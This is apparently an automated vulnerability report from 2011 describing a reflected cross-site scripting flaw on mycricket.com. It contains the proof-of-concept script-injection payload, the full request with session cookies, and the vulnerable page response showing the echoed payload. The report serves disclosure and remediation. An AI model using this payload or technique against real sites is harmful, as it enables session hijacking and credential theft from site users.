XSS. favicon.ico, Unforgivable Vulnerability Example PoC, CWE-79, CAPEC-86

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Mon Mar 07 18:42:46 CST 2011.


Loading

1. Cross-site scripting (reflected)



1. Cross-site scripting (reflected)

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycricket.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af94a</script><script>alert(1)</script>16a92ac4540 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

Request

GET /favicon.icoaf94a</script><script>alert(1)</script>16a92ac4540 HTTP/1.1
Host: www.mycricket.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mycricket_rdi=ce3892442818c84a41fe0cf9c2a2aa1b; OAGEO=US%7CTX%7CDallas%7C75207%7C32.7825%7C-96.8207%7C623%7C214%7C%7C%7C; OAID=0d5e3d905b2ad8ca0c79d131c59a8c88; __utmz=174607422.1299535281.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174607422.1955309364.1299535281.1299535281.1299535281.1; __utmc=174607422; __utmb=174607422.1.10.1299535281; CP=null*; data=%7B%22lochash%22%3A%22%22%2C%22loc%22%3A%7B%22city%22%3A%22%22%2C%22state%22%3A%22%22%2C%22zip%22%3A%22%22%2C%22market%22%3A%22000%22%2C%22market_name%22%3A%22No+Zip%22%2C%22market_seo_name%22%3A%22%22%7D%2C%22mapZip%22%3Anull%2C%22isAuth%22%3Afalse%2C%22items%22%3A0%2C%22subtotal%22%3A0%2C%22hbx%22%3A%7B%22pr%22%3A%22%22%2C%22pc%22%3A%22%22%2C%22qn%22%3A%22%22%7D%7D

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Mar 2011 22:03:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.14-pl0-gentoo
Content-Type: text/html; charset=utf-8
Content-Length: 30848

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
    <title>invalid page | Cricket Wireless </title>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="shortcut icon" href="/favicon.ico" />
<script type="text/javascript">
   /* <![CDATA[ */
   var minicartService = "/cart/glance";
       var cartDataService = "";
       var userLocationService = "/cart/userLocation";
   var locationCheckService = "/cart/isLocationSet";
   var nextStepService = "/cart/nextStep";
   var changeIntentionService = '/cart/changeIntention';
   var envController = '/';
   /* ]]> */
</script>
   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
   <script type="text/javascript">
   /* <![CDATA[ */
    google.load("jquery", "1.3.2");
    google.load("jqueryui", "1.7.1");
   /* ]]> */
   </script>
   
   <script type="text/vbscript" src="/js/flashdetectvb.js"></script>
    <script type="text/javascript" src="/js/combined/sitewide.js"></script>
<script type="text/javascript" src="/js/mtagconfig.js"></script>
<link rel="stylesheet" type="text/css" media="all" href="/css/combined/sitewide.css" />
</head>
<body class="no-sidebars">
<!-- Begin LP Custom Variables-->
<script type="text/javascript">
// <![CDATA[
// Variables submission using lpAddVars
function initLivePersonVars(cartdata) {
lpAddVars('page','lpCartCount', cartdata != null ? cartdata.items : 0);
lpAddVars('page','lpCartTotal', cartdata != null ? cartdata.subtotal : 0.00);
lpAddVars('visitor','lpVisitorID', (cartdata != null && cartdata.isAuth) ? 'true' : 'false');
lpAddVars('session','lpOPFlag', 'false');
lpAddVars('session','lpZipCode', cartdata != null ? cartdata.loc.zip : 0);
};
// ]]>
</script>
<!-- End LP Custom Variables-->
   <div id="container">
   <div id="header">
           <div id="navigation-wrapper">
               <div id="navigation">
                   <div id="logo">
                       <a title="Cell Phones and Prepaid Plans - Cricket Wireless" href="/">
                           <img src="/images/header/header-cricketlogo.png" alt="Cell Phones and Prepaid Plans - Cricket Wireless" /></a></div>

                   <div id="nav-main">
   <ul class="clearfix">
       <li><a href="/shop"
               id="nav-shop">
               <img src="/images/header/nav-shop.gif" alt="Shop" /></a></li>
       <li><a href="/learn"
               id="nav-learn">
               <img src="/images/header/nav-learn.gif" alt="Learn About" /></a></li>
       <li><a href="/community/home"
               id="nav-community">
               <img src="/images/header/nav-community.gif" alt="Community" /></a></li>
       <li><a href="/support"
               id="nav-support">
               <img src="/images/header/nav-support.gif" alt="Support" /></a></li>
       <li><a href="https://account.mycricket.com/">
               <img src="/images/header/nav-account.gif" alt="My Account" /></a></li>
   </ul>
</div>
                   <div id="minicart-wrapper">
   <div id="minicart" class="minicart-closed">
       <div id="minicart-inner">
           <div id="minicart-info" class="clearfix">
               <p id="minicart-items"></p>
           </div>
           <div class="minicart-toggle" id="minicart-toggle-top" style="display:none">
            <a href="#" id="minicart-toggle-link">[+] show cart summary</a>
           </div>
           <div id="minicart-inner-wrapper">
           </div> <!-- /#minicart-inner-wrapper -->
       </div> <!-- /#minicart-inner -->
   </div> <!-- /#minicart -->

<script type="text/javascript">

function displayMiniCart(data) {
if (data) {
$('#minicart-items').html('items in cart: ' + data.items);

if(data.items) {
$('#minicart-info').append('<a href="https://account.mycricket.com/cart" class="btn orangeSm" name="&amp;lid&#61;cartglance&amp;lpos&#61;viewcart"><span>view cart</span><em>&nbsp;</em></a>');
$('#minicart-toggle-top').show();

$('#minicart-toggle-link').click(function(event) {
    event.preventDefault();
   if(!$('#minicart-inner-content').length) {
   $.ajax(
{
type: 'POST',
url: minicartService,
data: ({rand: Math.random()}),
   success: function(html) {
           $('#minicart-wrapper').html( html );
           var minicart = $('#minicart');
            var minicart_inner_wrapper = minicart.find('#minicart-inner-wrapper');
            var minicart_toggle_top = $('#minicart-toggle-link');
           
            minicart.removeClass('minicart-closed').addClass('minicart-opened');
            minicart_toggle_top.text("[-] hide cart summary");
            minicart_inner_wrapper.slideDown('slow');
            }
});
}
});
}
} else {
   $('#minicart-items').html('items in cart: 0');
}
}

</script></div>
               </div> <!-- /#navigation -->
               <div id="sub-navigation">
                   <div class="nav-sub" id="sub-nav-shop">
   <ul>
       <li >
           <a class="ajax-shop" title="cell phones" href="/cell-phones">cell phones</a></li>
       <li >
           <a class="ajax-shop" href="/cell-phone-plans">plans</a></li>
       <li >
           <a href="/muve-music">muve music</a></li>            
       <li >
           <a class="ajax-shop" href="/broadband">broadband</a></li>
               <li >
        <a href="/features-and-downloads">features &amp; downloads</a></li>
       <li >
           <a href="/cell-phone-accessories">accessories</a></li>
       <li class="no-border"><a href="https://account.mycricket.com/">already have cricket?</a></li>
   </ul>
</div>

<div class="nav-sub" id="sub-nav-learn">
   <ul>
       <li >
           <a href="/learn/cricket-wireless">cricket</a></li>
       <li >
           <a href="/cell-phones/mobile-phone-guide">cell phones</a></li>
       <li >
           <a href="/smartphones/overview">smartphones</a></li>
       <li >
           <a href="/cell-phone-plans/mobile-phone-plan-guide">plans</a></li>
       <li >
           <a href="/broadband/mobile-broadband-guide">broadband</a></li>
       <li >
           <a href="/paygo/prepaid-mobile-phone-guide">cricket PAYGo</a></li>
       <li >
           <a href="/features-and-downloads/mobile-download-guide">features &amp; downloads</a></li>
       <li >
           <a href="/cell-phone-accessories/mobile-phone-accessory-guide">accessories</a></li>
       <li class="no-border">
           <a href="/coverage/cell-phone-coverage">coverage</a></li>
   </ul>
</div>

<div class="nav-sub" id="sub-nav-community">
   <ul>
       <li>
           <a href="/community/cell-phone-news">news</a></li>
       <li>
           <a href="/community/events">events</a></li>
       <li>
           <a href="/community/cricket-outreach">cricket outreach</a></li>
       <li>
           <a href="/community/cell-phone-info">the 411</a></li>
       <li>
           <a href="/community/music-lounge">music lounge</a></li>
       <li class="">
           <a href="/manvsmap">man vs map</a></li>
       <li class="no-border">
           <a href="/gift_guide">gift guide</a></li>
           
   </ul>
</div>                </div> <!-- /#sub-navigation -->

           </div> <!-- /#navigation-wrapper -->

           <div id="page-top-wrapper">                <div id="page-top">
                                   <div class="csr">
                       <div id="Cricket-button-top"></div>                </div>
                                   <div id="search">
                                               <!-- Begin GSA Query Box -->
                       <form id="search-site" method="get" action="/sitesearch">
                           <fieldset>
                               <input type="hidden" name="site" value="all mycricket.com" />
                               <input value="search mycricket.com" name="q" id="search-for" class="text-input clear-this" type="text" />
                               <button type="submit" class="orangeMed"><span>go</span><em>&nbsp;</em></button>                            </fieldset>
                       </form>
                       <!-- End GSA Query Box -->
               </div>

                   <div id="nav-utility">
                       <ul id="special-tasks">
                           <li class="coverage-maps"><a href="/coverage/maps/wireless">Coverage Maps</a></li>
                           <li class="find-store"><a href="http://account.mycricket.com/cricketlocations/">Find a Store</a></li>
                           <li class="email-signup"><a href="/email-signup">Email Signup</a></li>
                       </ul>
                       <ul id="standard-tasks">
                           <li><a href="/activate">Activate</a></li>
                           <li><a href="/paygo/topup">Top-up</a></li>
                           <li><a href="/send-text-message-online">Send Text</a></li>
                           <li><a mporgnav href="https://espanol.mycricket.com" onclick="return switchLanguage('es');function switchLanguage(lang) {
                            MP.SrcUrl=unescape('mp_js_orgin_url');MP.UrlLang='mp_js_current_lang';MP.init();
                               MP.switchLanguage(MP.UrlLang==lang?'en':lang);
                               return false;
                           }"><strong>en Espa&ntilde;ol</strong></a></li>
                       </ul>
                   </div>
               </div>
            </div>
       </div> <!-- /#header -->
       <!-- Print Header, only shows when print css media is active -->
       <div id="print-header"><img src="/images/print/logo-print.png" alt="Cricket" /></div>
<!-- Title -->
<div id="content-top" class="clearfix">
   <div id="page-title-wrapper" class="clearfix">
       <div class="float-left"><h1 class="page-title" style="text-transform:lowercase;">invalid page</h1></div>
       <div class="float-right customer-location" id="customer-location"></div>
           </div>    
</div>
<!-- END Title -->

<!-- Processflow -->
<!-- END Processflow -->

<!-- Column Layout - could be 1, 2, or 3 columns depending on content. -->
<div id="col-wrapper"><div id="col-wrapper-inner" class="clearfix">


<!-- Header Content -->
<!-- END Header Content -->

   <!-- Center Content -->
   <div id="content"><div id="content-inner">
    <p style="text-align: center; margin: 1em;">
You have requested a page that is not available on the MyCricket.com Web site.<br /><br />
Please use our Site Map below to find what you are looking for.</p>
<style type="text/css">
.sitemap {
   float: inherit;
   width: 900px;
   padding: 20px 10px 20px 10px;
}

.col1 {
   width: 33%;
   float: left;
}

.col2 {
   width: 33%;
   float: left;
}

.col3 {
   width: 33%;
   float: left;
}

.col4 {
   width: 33%;
   float: right;
}

.sitemap-link-1 {
   font-size: 1.0em;
   font-weight: bold;
   
}

.sitemap-link-2 {
   font-size: 0.9em;
   font-weight: bold;
   padding-left: 5px;
}

.sitemap-link-3 {
   font-size: 0.9em;
   padding-left: 12px;
}

</style>
<p>At Cricket, we're proud to provide our customers with the best
wireless cellular service available. This page is kind of like a road
map to all the products, services and features on our Web site.</p>
<div class="sitemap small-font clearfix"><div class="col2"><br/><a class="sitemap-link-1" href="http://www.mycricket.com/">Cricket Home Page</a><br/><a class="sitemap-link-3" href="/send-text-message-online">Send Text Message</a><br/><a class="sitemap-link-3" href="https://account.mycricket.com/">My Account</a><br/><a class="sitemap-link-3" href="https://account.mycricket.com//cricketlocations">Find A Store</a><br/><a class="sitemap-link-3" href="/email-signup">Email Signup</a><br/><a class="sitemap-link-3" href="/activate">Activate</a><br/><a class="sitemap-link-3" href="/coverage/maps/wireless">Wireless Coverage Maps</a><br/><a class="sitemap-link-3" href="/coverage/maps/broadband">Broadband Coverage Maps</a><br/><a class="sitemap-link-3" href="https://www.connectcommerce.com/secure/partner_app_alt.html?ccmid=K221192">Affiliates</a><br/><a class="sitemap-link-3" href="/dealerrecruitment">Become A Dealer</a><br/><a class="sitemap-link-3" href="/site-map">Site Map</a><br/><a class="sitemap-link-3" href="/support/safety-information">Safety Information</a><br/><a class="sitemap-link-3" href="/support/terms-and-conditions">Terms & Conditions</a><br/><a class="sitemap-link-3" href="/support/return-policy">Return Policy</a><br/><a class="sitemap-link-3" href="/support/privacy-policy">PRIVACY</a><br/><br/><a class="sitemap-link-1" href="/current-customer-a">Shop</a><br/><a class="sitemap-link-2" href="/cell-phone-plans">Cell Phone Plans</a><br/><a class="sitemap-link-3" href="/cell-phone-plans/glossary">Cell Phone Plans Glossary</a><br/><a class="sitemap-link-2" href="/cell-phones">Cell Phones</a><br/><a class="sitemap-link-2" href="/broadband">Wireless Broadband Internet</a><br/><a class="sitemap-link-3" href="/broadband/plans">Broadband Plans</a><br/><a class="sitemap-link-3" href="/broadband/devices">Broadband Devices</a><br/><a class="sitemap-link-2" href="/features-and-downloads">Features & Downloads</a><br/><a class="sitemap-link-3" href="/features-and-downloads/features">Calling Features</a><br/><a class="sitemap-link-3" href="/features-and-downloads/music-games-apps">Music, Games & Apps</a><br/><a class="sitemap-link-3" href="/features-and-downloads/messaging">Text & Picture Messaging</a><br/><a class="sitemap-link-3" href="/features-and-downloads/phone-compatibility">Phone Compatibility Matrix</a><br/><a class="sitemap-link-3" href="/features-and-downloads/flex-bucket">Flex Bucket</a><br/><a class="sitemap-link-3" href="/features-and-downloads/mobile-download-guide">Mobile Download Guide</a><br/><a class="sitemap-link-3" href="/features-and-downloads/us-canada-mexico-packages">US Canada Mexico Packages</a><br/><a class="sitemap-link-3" href="/features-and-downloads/download/mybackup-app">MyBackup App</a><br/><a class="sitemap-link-3" href="/features-and-downloads/download/cricket-navigator-app">Cricket Navigator App</a><br/><a class="sitemap-link-3" href="/features-and-downloads/unlimited-international-text">Unlimited International Text</a><br/><a class="sitemap-link-3" href="/features-and-downloads/phonecompatibility">Phone Compatibility</a><br/><a class="sitemap-link-3" href="/features-and-downloads/unlimited-international-long-distance">Unlimited International Long Distance</a><br/><a class="sitemap-link-3" href="/features-and-downloads/calls-to-mexico">Calls To Mexico</a><br/><a class="sitemap-link-2" href="/paygo">Cricket PAYGo</a><br/><a class="sitemap-link-3" href="/paygo/prepaid-cell-phones">Prepaid Cell Phones</a><br/><a class="sitemap-link-3" href="/paygo/prepaid-cell-phone-plans">Prepaid Cell Phone Plans</a><br/><a class="sitemap-link-3" href="/paygo/faqs">Cricket PAYGo FAQs</a><br/><a class="sitemap-link-3" href="/coverage/cell-phone-coverage">Cell Phone Coverage</a><br/><a class="sitemap-link-3" href="/coverage/glossary">Coverage Glossary</a><br/><a class="sitemap-link-3" href="/coverage/premium-extended-coverage">Premium Extended Coverage</a><br/><a class="sitemap-link-3" href="/become-a-supplier/procurement-goals-and-policy">Procurement Goals And Policy</a><br/><a class="sitemap-link-3" href="/become-a-supplier/supplier-qualification-process">Supplier Qualification Process</a><br/><a class="sitemap-link-3" href="/become-a-supplier/cricket-procurement-standard-terms-and-conditions">Cricket Procurement Standard Terms And Conditions</a><br/><a class="sitemap-link-3" href="/become-a-supplier/green-procurement-policy">Green Procurement Policy</a><br/><a class="sitemap-link-3" href="/become-a-supplier/supplier-diversity">Supplier Diversity</a><br/><a class="sitemap-link-3" href="/become-a-supplier/supplier-policy">Supplier Policy</a><br/></div><div class="col3"><br/><a class="sitemap-link-1" href="/learn">Learn About</a><br/><a class="sitemap-link-2" href="/learn/cricket-wireless">Cricket Wireless</a><br/><a class="sitemap-link-3" href="/learn/compare-cell-phone-providers">Compare Cell Phone Carriers</a><br/><a class="sitemap-link-3" href="/learn/changing-cell-phone-carriers">Tips For Switching Carriers</a><br/><a class="sitemap-link-3" href="/learn/our-technology">Our Technology</a><br/><a class="sitemap-link-3" href="/learn/company-information">Company Information</a><br/><a class="sitemap-link-3" href="/learn/savings-calculator">Savings Calculator</a><br/><a class="sitemap-link-3" href="/learn/compare-cell-phone-providers/chart">Cell Phone Providers Comparison Chart</a><br/><a class="sitemap-link-3" href="/learn/triband">Triband</a><br/><a class="sitemap-link-3" href="/learn/Glossary">Glossary</a><br/><a class="sitemap-link-3" href="/careers">Careers</a><br/><a class="sitemap-link-3" href="/muve-music">Muve Music</a><br/><a class="sitemap-link-2" href="/cell-phones/mobile-phone-guide">Mobile Phone Guide</a><br/><a class="sitemap-link-3" href="/cell-phones/with/Camera">Camera Phones</a><br/><a class="sitemap-link-3" href="/cell-phones/with/Music-Player">Music Player Phones</a><br/><a class="sitemap-link-3" href="/cell-phones/with/Bluetooth">Bluetooth Phones</a><br/><a class="sitemap-link-3" href="/cell-phones/with/QWERTY-Keyboard">Qwerty Keyboard Phones</a><br/><a class="sitemap-link-3" href="/cell-phones/with/Mobile-Web">Mobile Web Phones</a><br/><a class="sitemap-link-3" href="/cell-phones/with/Touch-Screen">Touch Screen Phones</a><br/><a class="sitemap-link-3" href="/cell-phones/with/Dedicated-Music-Player-Muve">Muve Music Phones</a><br/><a class="sitemap-link-3" href="/cell-phones/with/smartphones">Smartphones</a><br/><a class="sitemap-link-3" href="/cell-phones/with/Flip-Clamshell-or-Bar">Flip Phones</a><br/><a class="sitemap-link-3" href="/cell-phones/with/Refurbished-Parts">Refurbished Phones</a><br/><a class="sitemap-link-3" href="/cell-phones/by/cricket">All Cricket Cell Phones</a><br/><a class="sitemap-link-3" href="/cell-phones/by/kyocera">All Kyocera Cell Phones</a><br/><a class="sitemap-link-3" href="/cell-phones/by/motorola">All Motorola Cell Phones</a><br/><a class="sitemap-link-3" href="/cell-phones/by/blackberry">All Blackberry Cell Phones</a><br/><a class="sitemap-link-3" href="/cell-phones/by/samsung">All Samsung Cell Phones</a><br/><a class="sitemap-link-3" href="/smartphones">Prepaid Smartphones</a><br/><a class="sitemap-link-3" href="/android">Cricket Android</a><br/><a class="sitemap-link-3" href="/blackberry">Cricket Blackberry Curve</a><br/><a class="sitemap-link-2" href="/cell-phone-plans/mobile-phone-plan-guide">Mobile Phone Plan Guide</a><br/><a class="sitemap-link-3" href="/cell-phone-plans/unlimited-mobile-plan-guide">Unlimited Mobile Plan Guide</a><br/><a class="sitemap-link-2" href="/broadband/mobile-broadband-guide">Mobile Broadband Guide</a><br/><a class="sitemap-link-3" href="/broadband/what-is-3g">What Is 3G?</a><br/><a class="sitemap-link-3" href="/broadband/glossary">Broadband Glossary</a><br/><a class="sitemap-link-2" href="/paygo/prepaid-mobile-phone-guide">Cricket PAYGo Guide</a><br/><a class="sitemap-link-3" href="/paygo/activate">How Do I Activate Cricket PAYGo?</a><br/><a class="sitemap-link-2" href="/cell-phone-accessories">Cell Phone Accessories</a><br/><a class="sitemap-link-3" href="/cell-phone-accessories/type/Batteries">Cell Phone Batteries</a><br/><a class="sitemap-link-3" href="/cell-phone-accessories/type/Bluetooth">Bluetooth Headsets</a><br/><a class="sitemap-link-3" href="/cell-phone-accessories/type/Cases">Cell Phone Cases</a><br/><a class="sitemap-link-3" href="/cell-phone-accessories/type/chargers">Cell Phone Chargers</a><br/><a class="sitemap-link-3" href="/cell-phone-accessories/type/data-and-memory">Cell Phone Data & Memory</a><br/><a class="sitemap-link-3" href="/cell-phone-accessories/type/Earbuds">Cell Phone Earbuds</a><br/><a class="sitemap-link-3" href="/cell-phone-accessories/type/Car-Chargers">Cell Phone Car Chargers</a><br/><a class="sitemap-link-3" href="/cell-phone-accessories/mobile-phone-accessory-guide">Mobile Phone Accessory Guide</a><br/><a class="sitemap-link-3" href="/cell-phone-accessories/browse">Browse Accessories</a><br/><a class="sitemap-link-3" href="/cell-phone-accessories/phone-compatibility">Phone Compatibility</a><br/></div><div class="col4"><br/><a class="sitemap-link-1" href="/community/home">Community</a><br/><a class="sitemap-link-3" href="http://www.mycricket.com/community/cell-phone-news">Cell Phone News</a><br/><a class="sitemap-link-3" href="http://www.mycricket.com/community/events">Events</a><br/><a class="sitemap-link-3" href="http://www.mycricket.com/community/cricket-outreach">Cricket Outreach</a><br/><a class="sitemap-link-3" href="http://www.mycricket.com/community/rebuilding-together">Rebuilding Together</a><br/><a class="sitemap-link-3" href="http://www.mycricket.com/community/community-involvement">Community Involvement</a><br/><a class="sitemap-link-3" href="http://www.mycricket.com/community/cricket-outreach/phone-recycling-program">Cell Phone Recycling</a><br/><a class="sitemap-link-3" href="http://www.mycricket.com/community/cell-phone-info">Cell Phone Info</a><br/><a class="sitemap-link-3" href="http://www.mycricket.com/community/music-lounge">Music Lounge</a><br/><br/><a class="sitemap-link-1" href="/support">Support</a><br/><a class="sitemap-link-3" href="/support/cell-phone-instructions/manufacturer/cricket">Cricket Phone Instructions</a><br/><a class="sitemap-link-3" href="/support/cell-phone-instructions/manufacturer/kyocera">Kyocera Phone Instructions</a><br/><a class="sitemap-link-3" href="/support/cell-phone-instructions/manufacturer/motorola">Motorola Phone Instructions</a><br/><a class="sitemap-link-3" href="/support/cell-phone-instructions/manufacturer/blackberry">Blackberry Phone Instructions</a><br/><a class="sitemap-link-3" href="/support/cell-phone-instructions/manufacturer/samsung">Samsung Phone Instructions</a><br/><a class="sitemap-link-3" href="/support/topic/Billing-and-Account-Management">Billing & Account Management</a><br/><a class="sitemap-link-3" href="/support/topic/muve-music">Muve Music</a><br/><a class="sitemap-link-3" href="/support/topic/Cricket-and-the-Community">Cricket & The Community</a><br/><a class="sitemap-link-3" href="/support/topic/Features-and-Services">Features & Services</a><br/><a class="sitemap-link-3" href="/support/topic/Phones-and-Devices">Phones & Devices</a><br/><a class="sitemap-link-3" href="/support/topic/Plans-and-Coverage">Plans & Coverage</a><br/><a class="sitemap-link-3" href="/unlimitedinternational">Unlimited International</a><br/><a class="sitemap-link-3" href="/green">Green</a><br/></div>
   </div></div> <!-- /#content-inner, /#content -->

   <!-- Sidebar left -->
   
   <!-- Sidebar right -->
    </div></div> <!-- /#col-wrapper-inner, /#col-wrapper -->
<!-- END Column Layout -->

       
    <div id="footer" class="margin-top-20">
           <div id="footer-content">

               
                                            <div id="foot-note-secure" class="no-foot-note-copy">
                           <div id="foot-note-secure-inner" class="no-seo">
                           
                               <div class="certs clearfix">
   <div class="verisign-seal padding-5">
       <script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.mycricket.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en"></script>
       <p><a class="new-win" href="http://www.verisign.com/ssl-certificate/" style="font-size: .65em; color: #000; text-decoration: none;white-space: nowrap;">ABOUT SSL CERTIFICATES</a></p>
   </div>

   <!-- START SCANALERT CODE -->
   <div class="scanalert-seal">
       <a href="https://www.scanalert.com/RatingVerify?ref=www.mycricket.com" class="new-win">
       <img height="54" width="94" class="padding-5"
           onclick="alert('Copying Prohibited by Law - HACKER SAFE is a Trademark of ScanAlert'); return false;"
           alt="HACKER SAFE certified sites prevent over 99.9% of hacker crime."
           src="https://images.scanalert.com/meter/www.mycricket.com/13.gif" /></a>
   </div>
   <!-- END SCANALERT CODE -->
</div>
                           
                               <div id="email-signup-box">
                                   <img alt="sign up for email" src="/images/icons/envelope.png" />                                    <img alt="sign up for email" src="/images/text/footer-heading-email.png" />                                <form id="email-signup" action="/email-signup" method="get">
                                   <fieldset class="clearfix">
                                       <input value="enter email address" name="footerSignupEmail" id="sign-up" type="text" class="float-left clear-this" />
                                           <button type="submit" class="orangeMed float-right"><span>sign up</span><em>&nbsp;</em></button>                                    </fieldset>
                               </form>
                               <p class="learn-more-link"><a class="link-arrow" href="/email-signup">learn more</a></p>
                               </div>
                           
                           </div>

                       </div>
                                   
               <div id="footer-links">
                   <div id="footer-links-outer">
                       <div id="footer-links-inner" class="clearfix">
                           <div id="cricketk">
                               <a href="/"><img alt="cricket logo" width="48" height="52" src="/images/icons/foot-cricket-logo.png" /></a>                            </div>
                                                       <div id="footer-navs">
                               <ul id="footer-main-nav" class="clearfix">
                                   <li><a href="/">Home</a></li>
                                   <li><a href="/cell-phone-plans">Cell Phone Plans</a></li>
                                   <li><a href="/cell-phones">Cell Phones</a></li>
                                   <li><a href="/muve-music">Muve Music</a></li>
                                   <li><a href="/broadband">Mobile Broadband</a></li>
                                   <li><a href="/cell-phone-accessories">Cell Phone Accessories</a></li>
                                   <li class="no-border"><a href="/features-and-downloads">Mobile Downloads</a></li>
                               </ul>
                               <ul id="footer-secondary-nav" class="clearfix">
                                   <li><a href="/coverage/cell-phone-coverage">Cell Phone Coverage</a></li>
                                   <li><a href="/support">Support</a></li>
                                   <li><a rel="nofollow" href="https://account.mycricket.com/">My Account</a></li>
                                   <li><a href="/learn">Learn About</a></li>
                                   <li><a href="/paygo/prepaid-cell-phones">Prepaid Plans</a></li>
                                   <li><a href="/community">Community</a></li>
                                   <li><a href="/careers">Careers</a></li>
                                   <li><a href="/learn/cricket-wireless">About Cricket</a></li>
                                   <li><a class="new-win" rel="nofollow" href="https://www.connectcommerce.com/secure/partner_app_alt.html?ccmid=K221192">Affiliates</a></li>
                                   <li class="no-border"><a href="/interconnectrequest">Interconnect Agreement Request</a></li>
                               </ul>
                               <ul id="footer-tertiary-nav" class="clearfix">
                                   <li><a rel="nofollow" href="/become-a-supplier">Become a Supplier</a></li>
                                   <li><a rel="nofollow" href="/sell-cricket">Become a Dealer</a></li>
                                   <li><a class="new-win" rel="nofollow" href="http://www.leapwireless.com">Leap Wireless</a></li>
                                   <li><a href="/site-map">Site Map</a></li>
                                   <li><a rel="nofollow" href="/support/faq/Cricket-EZ-Phone-andndash-Required-Software-Upgrade-to-Correct-911-Problem">Safety Information</a></li>
                                   <li><a rel="nofollow" class="letter-spacing-05" href="/support/terms-and-conditions">Terms &amp; Conditions</a></li>
                                   <li><a rel="nofollow" class="letter-spacing-05" href="/fairuse">Fair Use Policy</a></li>
                                   <li><a rel="nofollow" class="letter-spacing-05" href="/support/return-policy">Return Policy</a></li>
                                   <li><a rel="nofollow" class="letter-spacing-05" href="/acceptableuse">Acceptable Use Policy</a></li>
                                   <li class="no-border"><a rel="nofollow" class="letter-spacing-05" href="/support/privacy-policy">PRIVACY</a></li>
                               </ul>
                           </div><!-- /#footer-navs -->
                           
                       </div><!-- /#footer-links-inner -->
                       
       
                   </div><!-- /#footer-links-outer -->
                   <div class="copyright">&copy;2011 Cricket Communications, Inc.</div>
               </div><!-- /#footer-links -->
           </div><!-- /#footer-content -->
           
    </div><!-- /#footer -->    
</div><!-- /#container -->

<!--VISUAL SCIENCES CODE HBX1.5 (Error)-->
<!--COPYRIGHT 1997-2005 VISUAL SCIENCES,INC. ALL RIGHTS RESERVED. U.S.PATENT No.6,393,479B1 & 6,766,370. INFO:http://visualsciences.com-->
<script type="text/javascript">
var hbx=new Object();hbx.vpc="HBX0150.02e";hbx.gn="ehg-reddoor.hitbox.com";

//BEGIN EDITABLE SECTION
//CONFIGURATION VARIABLES
hbx.acct="DM560614E2RE94EN3";
hbx.mlc="/favicon.icoaf94a</script><script>alert(1)</script>16a92ac4540"; //multi-level content category

//alert('tmpl: hbx_page_code_for_error_pages');

try{
eval ('data = ' + $.cookie('data'));
var hbxCommerceVars={};
hbxCommerceVars.pv="0"; //product view flag, 0 = cart add, 1 = product view
hbxCommerceVars.pr=data.hbx.pr; //comma delimited products
hbxCommerceVars.pc=data.hbx.pc; //comma delimited prices
hbxCommerceVars.qn=data.hbx.qn; //comma delimited quantities
hbxCommerceVars.ca="";

}catch(e){
// do nothing
}

//alert('tmpl: hbx_commerce_defaults, pr: ' + hbxCommerceVars.pr + ', pc: ' + hbxCommerceVars.pc);
//END EDITABLE SECTION
var _sv=10;
</script><script type="text/javascript">_sv=11</script><script type="text/javascript">
function _A(v){return escape(v)}function _D(v){return(typeof eval("window._"+v)!=_hud)?eval("window._"+v):""}
function _II(a,b,c){return a.indexOf(b,c?c:0)}function _E(a){var b="",d=a.split(",");for(var c=0;c<d.length;c++)b+="&"+d[c]+"="+_A(_D(d[c]));return b}

var _hud="undefined",_ss="na",_sc="na",_cy="u",_hp="u",_vpc=hbx.vpc,_rf=document.location+"";var __r=".referrer";_er=eval("document"+__r)+"";
